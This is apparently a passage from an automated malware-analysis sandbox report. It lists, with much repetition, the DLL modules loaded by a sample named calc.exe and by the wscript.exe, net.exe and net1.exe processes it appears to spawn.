Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: jscript.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: jscript.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sxs.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: jscript.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\calc.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samlib.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
